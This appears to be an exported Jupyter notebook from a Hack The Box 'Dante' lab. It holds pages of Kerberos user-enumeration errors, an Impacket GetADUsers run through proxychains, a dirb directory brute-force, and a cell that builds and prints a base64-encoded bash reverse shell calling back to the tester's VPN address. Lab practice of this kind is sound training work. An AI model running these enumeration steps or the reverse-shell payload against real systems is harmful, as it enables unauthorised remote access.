[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

...

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Clien

<a id="impacketgetadusers"></a>
## Impacket - GetADUsers

[Back to Index](#index)

In [12]:
# Not working due to missing authentication...
# git clone https://github.com/SecureAuthCorp/impacket.git 
# sudo python3 ./setup.py install
locationGetADUsers="/home/kali/hackthebox/dante/impacket/examples/GetADUsers.py"
domainName = "DANTE.local"
domain = domainName + "/"
destIP = "172.16.1.20"
!proxychains python3 $locationGetADUsers $domain -dc-ip $destIP

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[*] Querying 172.16.1.20 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090728, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v2580 


In [ ]:
wordlist="/usr/share/wordlists/dirbuster/directory-list-1.0.txt"
!dirb "http://10.10.16.12:32000/" $wordlist -w


-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Dec 27 19:09:41 2021
URL_BASE: http://10.10.16.12:32000/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
OPTION: Not Stopping on warning messages

-----------------



<a id="bashrevshell"></a>
## Bash Reverse Shell

[Back to Index](#index)

In [2]:
reverseshellPort = 8095
vpnIP = "10.10.14.136"
b64 = !echo "/bin/bash -i >& /dev/tcp/$vpnIP/$reverseshellPort 0>&1" | base64
#cmd = "AB; echo " + b64[0] + " | base64 -d | bash' "
cmd = "echo " + b64[0] + " | base64 -d | bash"
print (cmd)

echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzNi84MDk1IDA+JjEK | base64 -d | bash
